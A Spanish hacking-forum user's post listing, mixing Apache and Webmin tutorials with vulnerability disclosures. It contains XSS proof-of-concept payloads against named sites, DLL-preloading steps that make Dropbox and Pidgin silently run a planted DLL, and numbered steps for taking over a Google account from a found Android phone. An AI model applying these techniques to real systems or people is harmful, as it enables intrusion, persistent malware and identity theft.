Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - blackdrake

#41
Galería / Wallpaper Underc0de
Mayo 18, 2015, 05:13:49 PM
Bueno, no es que sea muy bueno con el diseño gráfico, pero me aburría y salió esto:

Se aceptan críticas constructivas:






Ambas son iguales, pero el Underc0de de debajo, está más hacía arriba para que sea compatible con monitores más grandes (como en el mío).

Saludos.
#42
Underc0de / Menciones en Underc0de
Mayo 13, 2015, 05:09:07 PM

Hola a toda la comunidad de Underc0de,

Quería comentarles de que a partir de hoy se podrán realizar menciones en todos los mensajes, basta con añadir el símbolo @ antes del nick.

Ej: @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Automáticamente, ese usuario será notificado vía email.


Del mismo modo, podrá visualizar las notificaciones sin leer desde el desplegable del menú Perfil.


También, accediendo a Perfil >> Mostrar Mensajes >> Menciones, o accediendo a este enlace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Esta novedad está en Beta, por lo que es posible que experimenten cambios o fallos, que rogamos nos reporten cuanto antes.

Saludos,

#43
Off Topic / Feliz Cumpleaños Gn0m3
Abril 14, 2015, 03:40:50 PM

De parte de toda la comunidad, felicidades compañero!

Espero que estés pasando junto a todos tus seres queridos.

Muchas felicidades y que cumplas muchos más  ;D ;D
#44

A lo largo del año pasado se han conocido No tienes permitido ver enlaces. Registrate o Entra a tu cuenta No tienes permitido ver enlaces. Registrate o Entra a tu cuentaque confirman que muchos ataques DDoS están siendo generados desde páginas con vulnerabilidades de tipo Cross Site Scripting (XSS) Persistentes.

Esto es debido, a que los cibercriminales, inyectan código JavaScript en el interior de la vulnerabilidad XSS persistente que será ejecutado por todos los visitantes a través de su navegador. De esta manera se puede generar una gran cantidad de peticiones por segundo hacia el sitio atacado, incluido en el código JavaScript, y dependiendo del tráfico de visitas de la web que alberga el XSS persistente, generar el efecto de DDoS masivo.



Como se puede apreciar, este tipo de ataque puede ser muy dañino, ya que solo se necesita encontrar un sitio vulnerable a Cross Site Scripting (XSS) persistentes con bastante tráfico y visitantes que mantengan la página abierta, para mantener el código JavaScript ejecutándose en su navegador.

Los atacantes también tienen en cuenta, el tipo de petición que se realizará el código JavaScript insertado en a través del XSS, por ejemplo, una petición como:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Puede ser menos dañina que:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



La segunda URL causaría una cantidad más considerable de trabajo a nivel de procesamiento en el servidor de la víctima, debido a que tiene que buscar la palabra "incibe" en la base de datos.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta han señalado que los sitios de vídeo son un objetivo común para este tipo de ataques, ya que las víctimas pasan un largo periodo de tiempo visitando la página mientras se reproducen los videos. Esto los convierte en objetivo preferido de estos ataques, porque cuanto más tiempo esté abierta la página, más tiempo continúa el ataque.

En general, este tipo de ataque es simple y eficaz cuando los atacantes se toman su tiempo y ponen empeño en conseguirlo. También tienen una gran ventaja para el atacante, ya que no requieren ningún tipo de infección en un ordenador de los usuarios, sino tan sólo código JavaScript en sitios vulnerables.

¿Cómo podemos protegernos de este tipo de ataque?


Cómo cualquier ataque DDoS, lo primero que debemos de hacer es identificar el patrón utilizado por el atacante, por lo que podemos ejecutar el siguiente comando para visualizar los logs de acceso en nuestro servidor, en este caso Apache:


Una vez ejecutado, podremos visualizar en tiempo real las visitas de nuestro sitio, pudiendo así identificar la IP atacante.

- IPs y fecha de cada petición -

- Petición que recibe nuestro servidor web -

- User-Agent utilizado por los usuarios -

Como se puede observar, cada IP corresponde a los diferentes usuarios que están accediendo a la web infectada. Y es esta web la que se encarga de que los usuarios, sin ser conscientes de ello, lancen peticiones a nuestro servidor.

Puesto a que no han editado las cabeceras, podemos saber la página que se está utilizando para generar el ataque Ddos.

En este caso, es No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Dado este punto, lo mejor sería avisar al administrador de esa página web, pues seguramente no sea consciente de lo que esté ocurriendo. Mientras los programadores del sitio arreglan la vulnerabilidad, podemos bloquear el acceso de las IPs atacantes para intentar frenar el ataque DDoS que estamos recibiendo.

Mientras tanto, podemos bloquear el acceso al servidor a las IPs atacantes, en este caso, bloquearemos las IPs con fail2ban. No tienes permitido ver enlaces. Registrate o Entra a tu cuentaes un script programado en Python que monitoriza los logs de Apache en busca de patrones sospechosos, además es capaz de tomar medidas para bloquear a los atacantes ya sea con iptables o lanzando un comando de nuestra elección. Se distribuye bajo licencia GNU.

Fail2ban, nos permite filtrar las la peticiones por múltiples campos como por IPs, referer de la cabecera o por el número de conexión en un tiempo dado. En, nuestro ejemplo podríamos filtrar por el referer "No tienes permitido ver enlaces. Registrate o Entra a tu cuenta" .

En caso de no disponer de este dato deberíamos tener en cuenta todas las peticiones, filtrando por las cadena "GET / HTTP/1.1", condición que es muy común y con la que podríamos banear visitas legitimas.

- Instalación de fail2ban -

Veamos como configurar Fail2ban. El directorio de configuración de Fail2ban se encuentra en: /etc/fail2ban/ en donde existen dos directorios más: action.d y filter.d

  • action.d: Encontraremos las acciones que Fail2ban realizará cuando alguno de nuestros filtros encuentre alguna IP haciendo maldades.
  • filter.d: Se almacenarán los filtros que utilizaremos para identificar a los atacantes.

Para evitar el ataque editaremos el archivo /etc/fail2ban/jail.conf para añadirle las siguientes líneas:

- Líneas de configuración que debemos añadir -


  • Maxretry: Especifica cuantos intentos vamos a dejar antes de banear la ip.
  • findtime: Es el período de tiempo en segundos que estamos contando los "reintentos" (300 segundos = 5 minutos).
  • bantime: Es el tiempo que debemos esperar para liberar las peticiones, ósea el tiempo que la IP estará baneada, en este caso se trata de 5 minutos.
  • logpath: La ruta de nuestro log de Apache.

Es importante configurar correctamente este archivo, ya que, si lo hacemos mal, fail2ban baneará visitas legitimas.

Ahora creamos el archivo de filtrado en /etc/fail2ban/filters.d/http-get-dos.conf y dentro de este, colocamos las siguientes líneas:

- Líneas de configuración que debemos añadir -

Por último, debemos reiniciar Fail2ban para que coja la nueva configuración.

- Comando para reiniciar fail2ban -

Una vez reiniciado, solo debemos esperar a que fail2ban banee automáticamente a las IPs atacantes, podremos ver los baneos que realiza desde su fichero de logs /var/log/fail2ban.log

- Baneo de la IP 1.20.10.1 -

Cuando esta IP intente acceder a nuestro servidor, fail2ban se lo impedirá.


¿Por qué baneamos las IPs con fail2ban y no desde Apache o htaccess?


Esto es debido, a que si bloqueamos las IPs desde el nivel de aplicación es ineficaz, ya que, el servidor, en este caso Apache, recibe la petición igualmente. Si utilizamos algún firewall como iptables, bloqueamos las conexiones a nivel de red y de este modo Apache nunca procesa la petición.

Por ultimo comentar que aunque Fail2ban limita el impacto de un ataque de este tipo no es una solución definitiva, ya que el servidor sigue recibiendo las peticiones. En caso de que un ataque genere un gran volumen podría provocar igualmente una denegación de servicio en nuestro servidor.

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Autor: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (Blackdrake)

#45
Hacking ShowOff / [XSS] Kiwiirc
Marzo 01, 2015, 05:31:04 PM
Como siempre entraba al irc, me dió por probar la seguridad de kiwiirc, y sorpresa!





Reportado y fixeado.

Agradecimientos: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un saludo.
#46

Si no habéis leido la primera parte, os lo recomiendo pues os ayudará a seguir con esta: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Continuamos con el fichero /etc/apache2/sites-available

ServerAdmin

Permite configurar la dirección del administrador del servidor web que se mostrará si el servidor genera una página de error.

Código: bash
ServerAdmin [email protected]


ServerName

Indica el nombre del servidor.

Código: bash
ServerName www.underc0de.org:80


DocumentRoot
Indicamos el directorio raíz donde colocaremos las páginas web.

Código: bash
DocumentRoot "/www/webs"


También es necesario cambiar la directiva Directory (que veremos más adelante)

Código: bash
<Directory "/www/webs">


UserDir
Indica si se debe permitir que cada usuario de nuestro sistema tenga su propia carpeta personal en el servidor web.

Código: bash
UserDir public_html


DirectoryIndex
Especifica la página por defecto que se buscará al acceder a un directorio de la jerarquía de nuestro sitio.

Código: bash
DirectoryIndex index.html, index.htm, index.php, inicio.html


Si accedemos a un directorio que no contiene ninguno de los archivos especificados, Apache crea dinámicamente un archivo que lista los contenidos:


Esto lo podemos deshabilitar con la directiva (Dentro de <Directory>:

Código: dos
Options -Indexes


Por lo que ahora saldrá Forbidden:


Alias
Permite crear alias para archivos o directorios

Código: bash
Alias /icons/ "/var/www/icons/"
<Directory "/var/www/icons"/>
Options Indexes MultiViews
AllowOverride None
Order allow, deny
Allow from all
</Directory>


Activando/Desactivando módulos en Apache2


Para activar un módulo usamos el comando a2enmod con el nombre del módulo:

Código: bash
sudo a2enmod speling


Automáticamente nos informa de lo que está sucediendo:

Código: text
Enabling module speling.
To activate the new configuration, you need to run:
service apache2 restart


Para desactivarlo lo haremos igual pero con el comando a2dismod

Código: bash
sudo a2dismod speling


Hosts Virtuales en Apache2

Apache puede servir varios sitios web desde un único servidor web. El cliente nunca diferenciará si son sitios en servidores diferentes o en la misma máquina.

La configuración del servidor virtual por defecto se puede consultar aquí:

Código: bash
sudo nano /etc/apache2/sites-available/default


(En estas últimas versiones de apache puede ser que el archivo se llame 000-default.)


Como comenté antes, podemos desactivar el listado de los contenidos de una carpeta con la siguiente linea:

Código: bash
Options -Indexes


Si queremos activarlo, utilizamos:

Código: bash
Options Indexes



Accedemos a /etc/apache2/sites-available y creamos un nuevo archivo (se recomienda que tenga el nombre del dominio + .conf)

Código: bash
<VirtualHost *:80>

        ServerAdmin [email protected]

        ServerName  www.underc0de.org

        ServerAlias underc0de.org www.underc0de.org

        # Indexes + Directory Root.

        DirectoryIndex index.php

        DocumentRoot /var/www/underc0de

</VirtualHost>


Guardamos... y ejecutamos lo siguiente:

Código: bash
sudo a2ensite underc0de.org.conf


Reiniciamos apache

Código: bash
sudo /etc/init.d/apache2 reload


O bien podemos usar:

Código: bash
sudo service apache2 restart


Y ya tendremos nuestro dominio funcionando y apuntando a ese directorio (obviamente las DNS del servidor tienen que estar correctamente configuradas), el directorio al que apunta (/var/www/underc0de) se puede crear antes o después.

En caso de querer desactivar el dominio..

Código: bash
sudo a2dissite acceso.ovh


Y reiniciamos apache

Código: bash
sudo /etc/init.d/apache2 reload


O bien podemos usar:

Código: bash
sudo service apache2 restart



Y hasta aquí el tutorial de Apache, espero que os haya servido.

Un saludo.
#47

Empezaremos desde el principio, ¿qué es apache? Apache es un servidor web HTTP de código abierto, pueden descargarlo e instalarlo de la siguiente manera:

sudo apt-get install apache2

Algunos comandos de interés:

apache2 -v Mostrará la información de versión, módulos y modo de funcionamiento.

apache2 -l Nos mostrará los módulos instalados.

Diferentes archivos de configuración en apache:

apache2.conf

Es el fichero de configuración global, y se encuentra en /etc/apache2/apache2.conf. Incluye las directivas principales del servidor, además, al final del archivo y mediante las órdenes include se le indica al servidor que debe cargar otros archivos de configuración.

ports.conf

En este fichero se establecen las direcciones IP y los puertos que va a usar el servidor. Por defecto se escucha el puerto 80, y en caso de que activemos el protocolo SSL, usaríamos el 443.

ennvars

Se utiliza para configurar las variables de entorno del servidor.

httpd.conf

Es el fichero de configuración principal, ya que se recomienda que el administrador del servidor introduzca en él las configuraciones adicionales en lugar de incluirlas enapache2.conf.

/etc/apache2/conf.d/

En este directorio se incluyen configuraciones adicionales y algunas aplicaciones web ubican aquí sus archivos de configuración.

Ahora que ya sabemos para que se utiliza cada archivo de configuración, podemos ponernos a configurar el archivo apache2.conf

ServerRoot
Indica el directorio raíz de la instalación de Apache. No se refiere al directorio donde colocaremos las páginas web. Solo deberemos modificar esto si movemos el servidor a otra ubicación.

Código: bash
ServerRoot "/www"


Timeout
Son los segundos que esperan las respuestas durante la comunicación.

Código: bash
Timeout 300


KeepAlive, MaxKeppAliveRequests y KeepAliveTimeout

Determina si el servidor va a permitir que cada conexión haga más de una petición. El problema de activarlo es que un único cliente puede consumir demasiados recursos y saturar el servidor.

Activamos o desactivamos KeepAlive.
Código: bash
KeepAlive off/on


Determina el número de peticiones que podrá realizar cada conexión.

Código: bash
MaxKeepAliveRequests 100


Determina el tiempo que el servidor esperará antes de atender una nueva petición del mismo cliente.

Código: bash
KeepAliveTimeout 15


StartServers, MaxClientes y MaxRequestsPerChild

Apache crea y destruye servidores automáticamente según el tráfico que tenga que atender en cada momento.

Establecemos los servidores que se creearán al arrancar.

Código: bash
StartServers 5


Establece el número máximo de clientes que podrá atender Apache a la vez

Código: bash
MaxClients 150


Establece cuantas peticiones podrá atender cada cliente.

Código: bash
MaxRequestsPerChild 30


Port
Nos permite cambiar el puerto en el que el servidor espera las peticiones estándar.
Código: bash
Port 7000


Listen
Indica al servidor en que dirección y puerto debe escuchar las peticiones http.

Código: bash
Listen 80



User y Group

Estas dos directivas indican con qué usuario y grupo se lanzarán los procesos hijos que genere apache. Estos procesos no deben lanzarse con el usuario root por razones de seguridad.

En linux, por defecto el usuario nobody y el grupo nogroup tienen muy pocos privilegios.

Si queremos usar el número del grupo o del usuario en lugar del nombre debemos añadir # justo antes del número.

Código: bash
User nobody
Grupo #-1


AccessFileName
Indica el nombre del archivo en el que se deben buscar las directivas de acceso determinadas en cada directorio. Por defecto es .htaccess y no se recomienda cambiarlo.

Código: bash
AccessFileName .htaccess


DefaultType
Establece el tipo MIME para todos aquelos archivos a los que no se les pueda asignar uno mediante su extensión.

Código: bash
DefaultType /text/plain


Podemos especificar más:

Código: bash
DefaultType /text/html


HostnameLookups
indica al servidor si se debe hacer una consulta DNS para cada petición.

Código: bash
HostnameLookups off


ErrorLog
Es una directiva muy importante, ya que indica dónde ubuicar el archivo de registro de los errores que se produzcan en el servidor. El lugar por defecto es %ServerRoot%/logs/error_log.

Código: bash
ErrorLog logs/error_log


LogLevel
Establece cuánta información se guardará en el archivo de errores. Los valores posibles incluyen: debug, info, notice, warn, error, crit, alert, emerg.

Código: bash
LogLevel warn



Y hasta aquí la primera parte ^^

Link de la segunda: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un saludo.
#48
Hacking ShowOff / [XSS] Tuenti.com
Febrero 16, 2015, 06:21:29 PM
Bueno, puesto a que ya arreglaron todos los fallos ya puedo publicarlo, sin más, os dejo todos los detalles de las vulnerabilidades:

Url afectada: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (Antes era .com, lo cambiarian por mi? Quien sabe xDD)
Hall of fame: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (@alvarodh5 Álvaro Díaz)

XSS Stored en el apartado Mis Datos:

Básicamente, consiste en cambiar los datos de cuenta por un payload como este:

Payload: "><img src=x onerror=prompt('@alvarodh5')>



XSS Stored en Cuenta VIP:

Partiendo de la primera vulnerabilidad, accedemos a Cuenta Vip 0€ donde nos informa de nuestro saldo acumulado, y como nos indica nuestro nombre, es vulnerable:

Payload: <h1>@alvarodh5</h1>


XSS Reflejado en el buscador:


XSS Stored en los comentarios:

En los comentarios, se muestra el nombre de la persona (obvio), pues si modificamos nuestro nombre desde la misma página que antes, tendremos nuestro querido XSS Stored ^^



Por desgracia, no puedo reportar la open redirect, pues aún no la han fixeado, de todas formas, si que que puedo poner esta imagen ya que no desvelo nada xD



Por cierto, por si a alguien le han entrado ganas, ahora el dominio lo han modificado por este: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, y solo pueden acceder los que tengan acceso a tuenti móvil.
#49
Hacking ShowOff / [XSS] Youtube.com
Enero 05, 2015, 01:16:38 PM
Como hacía tiempo que no posteaba nada en esta sección, ya que últimamente busco solo fallos en empresas grandes por lo que se tarda en encontrar fallos y los reportes en cerrarse.

Hoy os traigo un xss que encontré en Youtube.

Solo hay que acceder a un vídeo aleatorio y escribir vuestro payload.




Reportado: Si
Fixeado: No
Bug Bounty: Duplicado

Un saludo ^^
#50
Wargames y retos / Underc0de Weekend #4 (Solucionario)
Diciembre 14, 2014, 08:02:09 AM

Hola a todos, les dejo el solucionario de las vulnerabilidades que se encontraron en el reto.

Gracias a todos por participar y enhorabuena a Seth por ganar.

Enlace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un saludo.
#51
Wargames y retos / Underc0de Weekend #4
Noviembre 15, 2014, 03:39:38 PM

Hola a todos!!!
Ya se encuentra disponible el Underc0de Weekend de esta semana!!

Encargados del reto: Blackdrake y Jimeno.

Tipo de reto: Web

En la página hay varias vulnerabilidades y se irán añadiendo más durante toda la semana, así que estad atentos! ^^

Irás encontrando pistas y detalles de como reportar el fallo, si eres el primero ganarás puntos, el que más puntos consiga, será el ganador del reto. (Los puntos que se conseguirán dentro del reto, no tienen nada que ver con los de la clasificación principal).

El reto vale 2pts para la clasificación principal.

Pista: pensad fuera de la caja, no todo lo que veis tiene que ser vulnerable
Nota: si encontráis alguna vulnerabilidad sabréis cómo hacernos llegar el reporte.
Suerte.

RETO CERRADO

Clasificación General

1. Seth --> 2 puntos
2. Gorebrau --> 1 punto
3. 1v@n --> 1 punto
4. Satyricon --> 1 punto

Nota: Con el fin de hacerlo más interesante, los retos seguirán estando disponibles y se le dará puntos a todos los que lo realicen, en caso de empate, ganará el usuario que antes ha reportado una mayor cantidad de fallos.


GANADOR DEL RETO SETH, ENHORABUENA
#52
IOS / Quitar "palomita" azul de Whatsapp
Noviembre 12, 2014, 08:54:09 AM
Hola a todos, puesto a que el tema de la "palomita" azul de Whatsapp está dando mucho de que hablar, era obvio que algún programador hiciese esta aplicación.

Para poder eliminarlas, tienen que tener Iphone con Jailbreak y obviamente con Cydia instalado.

Puesto a que no tengo Iphone, no pude hacer el videotutorial, pero encontré uno por YouTube.




Saludos.
#53

Antes de nada... ¿Qué es Webmin?

CitarWebmin es una herramienta de configuración de sistemas accesible vía web para OpenSolaris, GNU/Linux y otros sistemas Unix. Con él se pueden configurar aspectos internos de muchos sistemas operativos, como usuarios, cuotas de espacio, servicios, archivos de configuración, apagado del equipo, etcétera, así como modificar y controlar muchas aplicaciones libres, como el servidor web Apache, PHP, MySQL, DNS, Samba, DHCP, entre otros.

Pasos para instalar webmin:

1. Accedemos al fichero para añadir un nuevo repositorio

Código: bash
sudo nano /etc/apt/sources.list


2. Añadimos la siguiente linea:

Código: bash
deb http://download.webmin.com/download/repository sarge contrib



3. Nos descargamos la key y la instalamos:

Código: bash
wget -q http://www.webmin.com/jcameron-key.asc -O- | sudo apt-key add -




4. Hacemos un update.

Código: bash
sudo apt-get update



5. Instalamos webmin

Código: bash
sudo apt-get install webmin



OPCIONAL (DESACTIVAR HTTPS)

6. Accedemos al fichero:

Código: bash
sudo nano /etc/webmin/miniserv.conf



7. Modificamos la linea que dice ssl y ponemos un 0


Accedemos a webmin (url por el puerto 10000)



Saludos.
#54
Underc0de / Temas de Underc0de
Octubre 12, 2014, 05:53:32 PM
Hola a todos, hago este post para que sepan que hay más temas en Underc0de y para enseñarles como cambiarlos:

Paso 1. Entrar a Perfil.


Paso 2. Editar Perfil -->  Configuración de Apariencia y Diseño


Paso 3. Tema actual click en Cambiar


Paso 4. Elegir el tema que quieran.


Paso 5. Aceptar el tema y visualizarlo.




#55
Hacking ShowOff / [XSS] Anonymouse.org
Agosto 28, 2014, 08:00:19 PM
Quien no ha visitado No tienes permitido ver enlaces. Registrate o Entra a tu cuenta? Pues como pueden comprobar, tienen xss :/





Al reportar el fallo, y escribir el <h1> me di cuenta de que era vulnerable, ya que al mostrar el mensaje enviado a los administradores se ejecutaba.
#56
Hola a todos, estoy entre dos antenas (a no ser, que me recomienden otra), y no sé cual de las dos escoger, si alguno puede echarme una mano se lo agradeceré cabe destacar, de que el objetivo de esto es hacer auditorias de red.

Estas son las dos antenas:

Tp-Link TL-WN7200ND

150 Mbps, 500 MW

Más caracteristicas: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


WiFiSKY 3000mW USB WiFi Ralink 3070L + Antena 11dBi - Adaptador USB

Mas informacion en: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Gracias, Un saludo! :D
#57
¿Quién no se ha fijado nunca en la firma de Snifer? Pues el otro día entré en la página web que genera ese tipo de firmas y para mi sorpresa esto es lo que encontré :D



  • URL No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
  • Reportado: Si, y NO FIXEADO.
  • Vector: <img src=x onerror=prompt('@alvarodh5')>
#58
Hacking ShowOff / [XSS] Youtube-Mp3
Agosto 11, 2014, 01:55:44 PM
#59

Esta prueba de concepto que voy a explicar hoy, no es para nada algo nuevo, hace tiempo que se conoce y, que además se ha usado para atacar tanto empresas como usuarios. Es un tipo de ataque que, normalmente pasa bastante desapercibido. Ya que, no es las primeras cosas que se pone uno a investigar. Es por eso que, bien usado puede ser un quebradero de cabeza para un analista forense que le toque investigar el caso.

¿Cómo se da este fallo?

Ocurre cuando un programa hace llamadas a DLL sin definir bien el PATH o son llamadas que intenta acceder a PATHS que un usuario malintencionado podría modificar.

¿Qué es la precarga insegura de DLL?

Pues según Microsoft, la precarga insegura de DLL es:

Citar"Cuando una aplicación carga dinámicamente una biblioteca de vínculos dinámicos (DLL) sin especificar una ruta de acceso completa, Windows intenta encontrar la DLL buscando en un conjunto bien definido de directorios. Si un atacante obtuviera el control de uno de los directorios, podría obligar a que la aplicación cargara una copia malintencionada de la DLL en lugar de la DLL que se esperaba. Estos ataques, conocidos como "ataques de precarga de DLL", son habituales en todos los sistemas operativos que admiten la carga dinámica de bibliotecas DLL compartidas. El efecto de tales ataques podría ser que un atacante ejecutara código en el contexto del usuario que ejecuta la aplicación."

¿Cómo detectar una llamada insegura de DLL?

Para poder encontrar este fallo en un programa, basta con usar la herramienta procmon de Windows Sysinternals: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez descargada vamos a realizar la prueba con pidgin. Para ello abrimos procmon y filtramos por el proceso "pidgin":


Ejecutamos pidgin y comprobamos que realmente aparecen las diferentes llamadas que hace pidgin al ejecutarse. Una vez ejecutado volvemos a filtrar, esta vez buscaremos por el resultado "PATH NOT FOUND" y filtraremos también el path por todo aquel string que contenga la palabra "dll".


De esta manera deberán aparecer todas las llamadas a DLLs que han sido realizadas a paths inexistentes:


Ahora solo falta crear el directorio y plantar la DLL para que pidgin la ejecute y de esta manera poder plantar un programa malicioso de manera "silenciosa".

PoC

Para las siguientes PoC he usado Dropbox y pidgin como un ejemplo de cómo usando estas llamadas inseguras he podido ocultar un "código malicioso" dentro de una DLL el cual es llamado cada vez que se ejecuta uno de estos 2 programas. Los pasos son los siguientes:

Dropbox
  • Descargar la siguiente dll: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
  • Poner dentro de %APPDATA%\Dropbox\bin con el nombre ntmarta.dll
  • Ejecutar Dropbox

Pidgin*
  • Crear el siguiente Path %USERPROFILE%\.gtk-2.0\2.10.0\engines\
  • Descargar la siguiente dll: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
  • Copiar la dll dentro de la carpeta que hemos creado en el paso 1
  • Cambiar el nombre de la DLL a libwimp.dll
  • Ejecutar Pidgin

*Nota: Cabe destacar que el problema de pidgin viene por el uso de gtk y no del mismo pidgin.

Y aquí las imágenes de la PoC


Y una vez ejecutemos pidgin veremos la siguiente pantalla:


Lo mismo pasa con dropbox:



Como se puede observar el fallo se puede ejecutar dentro del contexto del usuario y en el caso de Dropbox, esta DLL se ejecutaría cada vez que se iniciara el pc debido a que Dropbox crea un registro para que se ejecute en cada inicio del ordenador.

Esto desde el punto forense podría implicar complicaciones a la hora de encontrar el malware debido a que de entrada, el programa que llama a esta DLL es un programa benigno instalado por el mismo usuario y las librerías que llama están dentro de su path... por lo que a primera vista no debería parecer una llamada "maliciosa"...

Fuente: SBD
#60
Cursos, manuales y libros / [Libro] DDos for Dummies
Agosto 09, 2014, 10:54:26 AM

Como ya he comentado en otras ocasiones, este tipo de libros "for dummies" me parecen bastante buenos como introductorios o como resúmenes de problemas y soluciones de seguridad, y a modo de menú degustación, nos dan las pautas para profundizar más en cada tema.

En este caso, fue en una visita a un mayorista, cuando vislumbré el último ejemplar del libro (por decir algo, por la extensión de 44 páginas, más bien diría folleto) en una estantería junto a más publicidad y pedí que me lo diesen con miras a hacer una crítica en el blog y por qué no, aprender cosas nuevas. Como hemos analizado en casos anteriores, estos libros suelen estar "patrocinados" por un fabricante de soluciones de seguridad relacionado con el tema, pero pese a ser ligeramente influenciados hacia donde el fabricante demanda, suelen mantener la esencia del problema de seguridad y dar información aséptica al lector, sobre cómo resolverlos.

El de hoy va de cómo afrontar una de las grandes amenazas que toda organización pueda sufrir en alguna ocasión: un DDoS o Denegación de Servicio (Distribuída o no), y el patrocinador es Corero (fabricante de dispositivos anti-DDoS).

El "libro", que como digo, sería la versión "Air" o mini de los "for dummies", en su primer capitulo define lo que es una Denegación de Servicio Distribuida, los tipos de éstos, dependiendo si se trata de inundación de tráfico ICMP, TCP o UDP, el concepto de botnet y enumera los sectores de empresas más comúnmente atacados: webs de venta a través de Internet, juegos online o servicios financieros entre otros. Igualmente hace con las motivaciones o diferentes móviles de los atacantes: Extorsión, ventaja competitiva o por hacktivismo político o ideológico.

El segundo capítulo detalla los motivos de por qué las soluciones de seguridad tradicionales (como firewalls e IPS) no son la solución a este tipo de amenazas. Igualmente, y pese a decir que sí son efectivos ante los DDoS, indican las contras de los servicios de tráfico limpio ofrecidos por determinados proveedores así como los servicios especializados para combatir DDoS en la nube (generalmente en modo de CDN o con motores de inteligencia sobre discriminación de tipos de tráfico lícito/ilícito). Los argumentos utilizados para tirar por tierra estos servicios, desde mi punto de vista, pese a ser ciertos, no son justificación suficiente para llevar al lector donde el autor, mi tocayo traducido al inglés, Lawrence C. Miller predispone al usuario a que compres un appliance específico del fabricante Corero, para bloquear ataques DDoS en modo "on-premise" (es decir, en tus propias instalaciones), ilustrándolo para ello con un caso de éxito en una compañía americana.

En el tercer capítulo definido como "Best Practices for DDoS Attack mitigation" (reconozco que dije... qué bien! aquí es cuando viene el detalle a nivel técnico) te invade con prácticas de buen gobierno (muy en la línea CISSP) para el antes, mientras y después de un ataque DDoS, con tablas con checks a tener en cuenta. Dentro de este capítulo se habla también de la necesidad de proteger los servidores DNS y de cómo detectar con herramientas tan comunes como netstat o Wireshark que hay un ataque de Denegación de Servicio.

El título del cuarto capítulo es: "Your Best Protection: On-premises DDoS Defense" en el que se dan unas pinceladas por encima de cómo trata el tráfico de red los equipos de Corero con una tecnología patentada, y lo ilustra con un par de casos de éxito más. Si alguien espera que haya algún leak de los algoritmos utilizados o el más mínimo atisbo de algo técnico o de valor sobre cómo trabajan estos equipos, se unirá a mí en la sensación de quedarse con las ganas.

El quinto capítulo, es: "Eight Benefits of Corero's DDoS Defense System", en los que se indica directamente las razones por qué se recomienda un dispositivo de estas características en cada organización, en concreto los de Corero.

Estamos acostumbrados a que estos libros que están patrocinados, una vez planteado el problema incorporen cómo un fabricante lo afronta y aporta soluciones al respecto, pero en el caso de este ejemplar, bajo mi punto de vista, es excesiva la cantidad de "ads" del sponsor en tan pocas hojas.

En mi opinión, no es de los mejores que he leído, pero puede resultar interesante a aquellos de vosotros que estéis comenzando a aprender sobre amenazas de DDoS.

Fuente: SBD

Enlace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Idioma: Inglés
#61
Hacking ShowOff / [XSS] *.como.com
Agosto 06, 2014, 03:48:48 PM
El otro día estaba visitando mi correo (gmail.com) y me dió por entrar a un banner de publicidad que decía algo como "Cree su aplicación móvil grátis y rápido".

Y como la curiosidad mató al gato, esto es lo que descubrí :$

Reportado: Sí, Sin Respuesta







#62
Para el que no la conozca, eventbrite es una página que nos ayuda a gestionar eventos.

Les envié otro xss, pero por problemas del ordenador he perdido la captura. (no está tampoco en gmail :/ )






Hall of fame:





Web: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Nota: @Jimeno y @Pr0ph3t también lo tienen ^^
#63

Hoy les vamos a mostrar el impacto que tiene perder su terminal móvil Android y no disponer de un código de seguridad o patrón de bloqueo robustos. Como se pueden imaginar por el título del post, la consecuencia va a ser el secuestro o suplantación de la identidad digital de la persona afectada. Comencemos...

Supongamos que soy una persona terriblemente malévola y que me he encontrado un teléfono Samsung Galaxy S4 en una butaca a la salida del cine. Este smartphone no dispone de bloqueo, por lo que a priori, lo primero que se me ocurre es que puedo llamar a mi novia en USA sin pagar ni un céntimo. Pues bien, esto es de lo mejor que le podría pasar a la pobre persona que ha perdido una parte de su cuerpo. Digo esto porque hoy en día nuestra vida completa la llevamos en el bolsillo convirtiéndose en una parte más de nuestro organismo, creando una necesidad que roza lo absurdo (conozco gente que duerme abrazada a su teléfono).

Lo siguiente que se me ocurre que se podría hacer es robar la cuenta de Gmail/Google de la siguiente manera:


  • 1.   Obtengo la dirección de correo electrónico asociada en el terminal móvil, simplemente abriendo la aplicación de Gmail.
  • 2.   Lanzamos los formularios de recuperación de contraseña a través de un navegador web en un ordenador. Haciendo click en ¿Necesitas ayuda? y posteriormente en "he olvidado mi contraseña", le introducimos el correo electrónico que hemos obtenido en el paso 1.
  • 3.   El asistente nos pregunta si recordamos alguna contraseña anterior, por lo que le diremos que "No lo sé".
  • 4. A continuación Google nos deja elegir entre enviarnos a otra cuenta de correo electrónico el proceso de recuperación o... continuar a través del teléfono móvil asociado a la cuenta. Pincharemos en esta última.
  • 5. En este punto en nuestro ordenador aparece un aviso indicando que debemos autorizar a través del móvil, el cambio de contraseña. Siendo esta solicitud válida durante 10 minutos.
  • 6.   Al instante en el terminal sustraído aparecen una serie de mensajes como los siguientes:
  • 7.   Tras simplemente darle a "Permitir" podemos establecer la contraseña que nosotros queramos en el ordenador,obteniendo el control total de la cuenta de Google.


